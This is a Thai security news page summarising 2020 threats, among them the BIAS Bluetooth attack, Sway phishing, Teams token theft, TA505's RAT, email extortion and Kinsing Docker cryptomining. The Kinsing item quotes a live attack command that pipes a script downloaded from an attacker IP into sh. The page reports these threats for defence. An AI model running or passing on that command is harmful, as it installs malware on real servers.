เตือนภัย !! มีการโจมตีผ่าน Bluetooth รู้แบบใหม่

ผู้เชี่ยวชาญเปิดเผย พบว่ามีการโจมตีผ่านช่องทาง Bluetooth ในรูปแบบใหม่ เรียกว่า Bluetooth Impersonation AttackS หรือ BIAS โดยการโจมตีนี้ทำให้ผู้โจมตีสามารถสวมรอยเป็นอุปกรณ์ของคุณจากระยะไกลได้           การโจมตีนี้อาศัยข้อบกพร่องของการจับคู่ระหว่างอุปกรณ์ที่เรียกว่า Link Key ที่เชื่อมต่อกันระหว่างอุปกรณ์หูฟัง และโทรศัพท์มือถือ โดยการปลอมแปลงนี้จะหลีกเลี่ยงในการตรวจสอบสิทธิ์ อีกทั้งการโจมตีนี้ยังสามารถนำประโยชน์ไปใช้เพื่อการโจมตีในรูปแบบอื่นๆได้อีกด้วย           ผลกระทบ : อุปกรณ์ที่ไม่ได้มีการอัปเดตตั้งแต่ ธันวาคม 2019  คำแนะนำ : ทำการ Update Patch ให้เป็นปัจจุบันอยู่เสมอ เพื่อทำการปิดช่องโหว่ ที่มา : https://thehackernews.com/2020/05/hacking-bluetooth-vulnerability.html
Read More

Microsoft Sway ใน Office 365 ตกเป็นเครื่องมือในการฟิชชิ่ง

PerSwaysion เป็นฟิชชิ่งแคมเปญที่กลุ่มอาชญากรไซเบอร์ทำร่วมกันเพื่อการโจมตีที่มีประสิทธิภาพและเป็นวงกว้าง ซึ่งมีกลุ่มอาชญากรไซเบอร์จากเวียดนามเป็นตัวหลักในการดำเนินการร่วมกับกลุ่มอื่นๆ โดยมีเป้าหมายเป็นสถาบันการเงินขนาดกลางและขนาดย่อม สำนักกฎหมาย กลุ่มอสังหาริมทรัพย์ในอเมริกา แคนาดา และประเทศอื่นๆ ในแถบยุโรป แคมเปญนี้ใช้ประโยชน์จากช่องโหว่ของ Microsoft Sway ใน Office 365 ทำให้ได้รับ credential ของบรรดาผู้บริหารแล้วสวมรอยส่งอีเมลฟิชชิ่งไปยังพนักงานคนอื่นๆ เพื่อหลอกถามข้อมูลสำคัญ ซึ่งขณะนี้มีบัญชีของผู้บริหารกว่า 150 คนที่ถูกใช้เป็นเครื่องมือ ที่มา : https://threatpost.com/microsoft-sway-abused-office-365-phishing-attack/155366/
Read More

แนวโน้มความปลอดภัยทางไซเบอร์จากไตรมาสแรกของปี63

 Ransomeware ทำให้สถานการณ์ของไวรัสโคโรน่าแย่ลง แทนที่จะเป็นเพียงการเข้ารหัสข้อมูล แต่ตอนนี้มีการขู่บังคับเหยื่อให้โอนเงินตามที่ผู้ร้ายต้องการ หากไม่ทำตามก็จะถูกเปิดเผยข้อมูลหรือขายต่อ Data breaches และ Phising ยังเป็นการโจมตีในอันดับต้นๆ เมื่อช่องทางการฟิชชิ่งไม่ได้มีแค่อีเมลอีกต่อไป แต่ยังมี SMS สื่อเครือข่ายสังคมออนไลน์ แม้แต่การโทรศัพท์เพื่อหลอกให้เหยื่อบอกข้อมูลสำคัญของตน ไม่มีข้อมูลใดเป็นความลับในสังคมออนไลน์ ทุกอย่างที่เราโพสต์หรือค้นหาในอินเทอร์เน็ตจะถูกบันทึกลงในเซิร์ฟเวอร์และผู้ให้บริการสามารถเรียกดูได้เสมอ  การเติบโตของสมาร์ทดีไวซ์ที่เสี่ยงต่อความปลอดภัย อุปกรณ์เหล่านี้กลายมาเป็นส่วนหนึ่งของชีวิตและเก็บรวบรวมข้อมูลประจำวันไปไว้ในเซิร์ฟเวอร์ แน่นอนว่าข้อมูลเหล่านี้ก็ดึงดูดอาชญากรไซเบอร์ด้วยเช่นกัน อุปกรณ์ทางการแพทย์มีความเสี่ยงที่สูงขึ้น กว่า 10 ปีมาแล้วที่อุปกรณ์ทางการแพทย์สามารถเชื่อมต่อกับอินเทอร์เน็ตได้ ขณะเดียวกันจำนวนช่องโหว่ของซอฟต์แวร์ที่พบก็มีมากขึ้นเช่นกัน การโจมตียานพาหนะด้วย Cyber-attackระบบขับเคลื่อนด้วยตัวเองของรถยนต์สมัยใหม่ต้องเชื่อมต่อกับอินเทอร์เน็ต ทำให้มีแนวโน้มที่จะถูกโจมตีทางไซเบอร์มากขึ้นและส่งผลกระทบต่อการจราจร โกดังดิจิตอลต่างๆตกเป็นเป้าหมายมากขึ้น การมาของเทคโนโลยีอย่าง IoT, Automation, AI, Big data ทำให้เกิดโกดังดิจิตอลซึ่งเป็นเป้าหมายของการโจมตีทางไซเบอร์ ช่องโหว่จากOSที่พัฒนาขึ้นเอง คาดว่าในปี 2568 จะมีอุปกรณ์ IoT กว่า 7 แสน 5 หมื่นล้านเครื่องบนอินเทอร์เน็ตที่ใช้ซอฟต์แวร์ของตัวเอง ทำให้มีความเสี่ยงในการโดนโจมตีระยะไกลมากขึ้น ที่มา : https://www.cybersecurityintelligence.com/blog/q1-2020-key-trends-in-cyber-security-4930.html
Read More

บัญชี Microsoft พบวิธีขโมยTeam ด้วยการส่งไฟล์ภาพ .gif

ข้อบกพร่องนี้เกิดจากวิธีรับรองความถูกต้องของรูปภาพ โดยแอปจะสร้าง JOSN Web Token ขึ้นมาสองตัว ตัวแรกคือ “authToken” ใช้รับรองความถูกต้องของผู้ใช้ ตัวที่สองคือ “skypeToken” สำหรับตรวจสอบสิทธิ์ของผู้ใช้กับทางเซิร์ฟเวอร์ ผู้โจมตีจะทำการเข้ายึดโดเมนย่อยที่มีช่องโหว่เอาไว้ก่อน เพื่อรอรับauthTokenจากเหยื่อ จากนั้นจะส่งไฟล์ภาพ.gif ที่แฝงลิงค์อันตรายไปยังห้องแชท เมื่อผู้ใช้เปิดดู บราวเซอร์ก็จะส่งคุกกี้ authToken ไปยังโดเมนย่อยที่ผู้โจมตีเปิดรอไว้โดยที่ผู้ใช้ไม่รู้ตัว หลังจากได้รับ authToken แล้วก็จะนำไปสร้าง skypeToken เพื่อใช้ยึดบัญชีของเหยื่อต่อ ผู้เชี่ยวชาญจาก CyberArkกล่าวว่าการโจมตีนี้สามารถแพร่กระจายได้เองเหมือนกับเวิร์ม เพียงแค่มีผู้ใช้คนอื่นในห้องแชทหลงเข้ามาคลิกเปิดไฟล์ พร้อมทั้งได้สาธิตวิธีการใช้ช่องโหว่นี้เอาไว้ด้วย ที่มา : https://securityaffairs.co/wordpress/102344/hacking/hacking-microsoft-teams-accounts.html
Read More

macOS และ iOS ตกเป็นเป้า “Text-bomb” ครั้งใหม่

อุปกรณ์ Apple เสี่ยงต่อการโดนโจมตีด้วย “Text-Bomb” เพียงเปิดดูข้อความหรือโพสต์ที่เป็นภาษาสินธุ (Sindhi) ซึ่งเป็นภาษาราชการของปากีสถาน สาเหตุเกิดจากการที่ macOS และ iOS ไม่สามารถแสดง unicode ของภาษาได้ ทำให้ระบบเกิดความสับสนจนต้องรีสตาร์ทที่ผ่านมา Apple เคยประสบกับปัญหาแบบนี้จากตัวอักษรอาหรับที่มีความคล้ายคลึงกันกับอักษรอินเดีย ซึ่งวิธีการแก้ไขในตอนนี้แนะนำว่าให้ปิดการแสดงตัวอย่างข้อความบน iPhone ไปก่อนจนกว่าจะมีการอัพเดท ที่มา : https://threatpost.com/apple-text-bomb-crashes-iphones-message-notifications/155144/
Read More

SDBbot RAT และแคมเปญ COVID-19 จากกลุ่ม TA505

IBM X-Force หน่วยงานให้บริการด้านการตอบสนองต่อภัยคุกคามกำลังอยู่ระหว่างการวิเคราะห์และจับตาดูการแพร่กระจ่ายของ Remote access Trojan (RAT) ที่ชื่อ SDBbot ซึ่งมีความเกี่ยวข้องกับกลุ่ม TA505                  TA505 เป็นกลุ่มอาชญากรรทางการเงินที่มุ้งเน้นโจมตีอุตสาหกรรมต่างๆ สถาบันการเงิน ร้านค้าและร้านอาหาร ที่ผ่านมากลุ่มนี้มีวิธีการโจมตีที่หลากหลาย ไม่ว่าจะเป็น Spear phising, Macro-enabled documents, embedded dynamic-link libraries (DLLs), legitimate cloud hosting services for malware distribution, Spoofing legitimate services like Microsoft and Google      …
Read More

แคมเปญ Email extortion ครั้งใหม่ได้เริ่มขึ้นแล้ว

Email extortion หรือการขู่กรรโชกทางอีเมลนั้นผู้โจมตีจะหลอกเหยื่อว่า “คอมพิวเตอร์ของคุณถูกแฮ็ก ทางเราได้รับรหัสผ่านและคลิปวีดีโอที่ถูกถ่ายจากเว็บแคมของคุณ หากไม่ต้องการให้ข้อมูลหลุดออกไป ให้โอนเงินมาผ่านทางบิทคอยน์” ซึ่งการหลอกลวงแบบนี้ก็มีมานานแล้ว แต่ตอนนี้กำลังกลับมาระบาดอีกครั้ง แม้ว่าหลายคนจะไม่สนใจอีเมลเหล่านี้ แต่ก็มีบางคนกังวลว่าข้อมูลของตนจะรั่วไหลจนต้องเสียเงินให้กับนักต้มตุ๋น หลังจากสัปดาห์แรกที่อีเมลเหล่านี้ส่งออกไปก็มีคนยอมโอนเงินมาให้ผู้โจมตี รวมทั้งสิ้น 50,000  ดอลลาร์ หรือคิดเป็นเงินไทยราวๆ 1,600,000 บาท ด้านล่างเป็นเนื้อหาตัวอย่างในอีเมลที่ผู้โจมตีใช้กับเหยื่อ ที่มา : https://www.bleepingcomputer.com/news/security/large-email-extortion-campaign-underway-dont-panic/
Read More

พบ “Kinsing” มัลแวร์สายขุดเหมืองบนDocker มีอัตราการแพร่กระจาย 1,000 พอร์ต/วัน

ขณะนี้ผู้ให้บริการคลาวด์คอนเทนเนอร์อย่าง Docker กำลังประสบปัญหาจาก “Kinsing” มัลแวร์แบบแพร่กระจายตัวเองที่อาศัยช่องโหว่จากการตั้งค่า Docker Daemon API ที่มีการเปิดพอร์ตสาธารณะไว้ โดยมีเป้าหมายในการโจมตีสูงถึง 1,000 คอนเทนเนอร์ต่อวัน รูปแบบการโจมตีเริ่มจากการที่ผู้โจมตีค้นหา Docker API ที่มีการเปิดพอร์ตสาธารณะไว้ แล้วทำการเชื่อมต่อเข้ากับพอร์ตดังกล่าว ก่อนที่จะทำการรัน Rogue Ubuntu container เพื่อเรียกใช้ “Kinsing” ให้ไปดาวน์โหลดคริปโตไมเนอร์มารันบนเครื่องเป้าหมาย จากนั้นจะทำการแพร่กระจายตัวเองไปยังคอนเทนเนอร์และโฮสต์อื่นๆ ต่อไป คำสั่งที่มักจะพบในการโจมตีคือ “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – 142.44.191.122/d.sh | sh;tail -f /dev/null.” เพื่ออัพเดท Docker…
Read More

Zoom ยอมรับไม่ได้เข้ารหัส end-to-end จริงอย่างที่โฆษณา แต่ใช้แค่ TCP/UDP

อย่างไรก็ตามเมื่อ The Intercept สอบถามไปยัง Zoom เรื่องการเชื่อมต่อแบบ end-to-end ก็ได้คำตอบกลับมาว่าตอนนี้ยังทำไม่ได้ Zoom ใช้แค่ TCP ร่วมกับ UDP เท่านั้น เท่ากับว่า Zoom ยังสามารถเข้าถึงข้อมูลและวิดีโอผู้ใช้งานได้อยู่ ซึ่งอาจส่งผลถึงกรณีที่รัฐบาลขอข้อมูลผู้ใช้งานจาก Zoom แบบเดียวกับที่ Google, Facebook และ Microsoft โดน (แต่บริษัทเหล่านั้นมีการออกรายงาน transparency report) Zoom ให้เหตุผลว่าที่ใช้คำว่า ‘end to end’ เพราะการเชื่อมต่อระหว่างปลายทาง (endpoint) ที่เป็น Zoom นั้นถูกเข้ารหัส (‘connection being encrypted from Zoom end point to Zoom end point‘) หรือกล่าวอีกอย่างคือ…
Read More

10 เคล็ดลับความมั่นคงปลอดภัยในสถานะการที่คุณต้องทำงานที่บ้าน

ในเวลานี้กระแสของเชื้อไวรัส COVID-19 นั้นส่งผลกระทบในวงกว้างในประเทศไทย และทั่วโลก ทำให้บริษัทหรือหน่วยงานต่างๆตื่นตัวในการเริ่มมีแนวคิดที่จะดำเนินการทำงานที่บ้านมากขึ้น ทางทีมจึงขอนำเสนอ 10 เคล็ดลับที่จะทำให้องค์กรของท่านปลอดภัยทั้งทางโลกไซเบอร์และตัวท่านเอง ดังต่อไปนี้ 1.ทำให้พนักงานเริ่มต้นทำงานที่บ้านได้ง่าย ในการทำงานที่บ้านต้องมีการตั้งค่าอุปกรณ์และเชื่อมต่อบริการต่างๆของหน่วยงาน อย่างเช่น E-Mail, Internal Service หรือ Sales Force เป็นต้น โดยเพิ่มโซลูชัน Self Service Portal (SSP) ที่ช่วยให้พนักงานสามารถตั้งค่าทุกอย่างได้ด้วยตนเอง และยังช่วยลดภาระของฝ่าย IT ได้อีกด้วย 2.ตรวจสอบให้มั้นใจว่าอุปกรณ์และระบบของท่านได้รับการป้องกันที่ดีพอ ดำเนินการตรวจสอบให้แน่ใจว่าอุปกรณ์ต่างๆ รวมถึงระบบต่างๆ ได้มีการอัพเดทแพตช์ให้เป็นปัจจุบัน เนื่องจากมัลแวร์ส่วนใหญ่นั้นอาศัยช่องโหว่จากการที่ผู้ใช้งานนั้นไม่ดำเนินการอัพเดทแพตซ์โจมตีได้ 3.มีการเข้ารหัสอุปกรณ์ เมื่อมีการนำอุปกรณ์ออกจากสำนักงานมักจะมีความเสี่ยงมากขึ้นเนื่องจากเสี่ยงต่อการสูญหายหรือโดนขโมย ควรมีการใช่เครื่อมมือเสริมในการช่วยเข้ารหัสเช่น BitLocker หรือ FileVault เป็นต้น 4.สร้างการเชื่อมต่อที่ปลอดภัยกลับไปยังหน่วยงาน มีการใช้ Virtual Private Network (VPN) ช่วยในการทำให้แน่ใจว่าข้อมูลทั้งหมดที่โอนระหว่างพนักงานกับเครือข่ายองค์กรนั้นมีการเข้ารหัสและมีการป้องกันในระหว่างถ่ายโอน รวมถึงไม่ถูกเปลี่ยนแปลง 5.มีการเพิ่มระดับการป้องกันเพื่อความปลอดภัยของอีเมล เนื่องจากการทำงานที่บ้านนั้นส่วนใหญ่จะมีการติดต่อผ่านทางอีเมลเป็นส่วนใหญ่…
Read More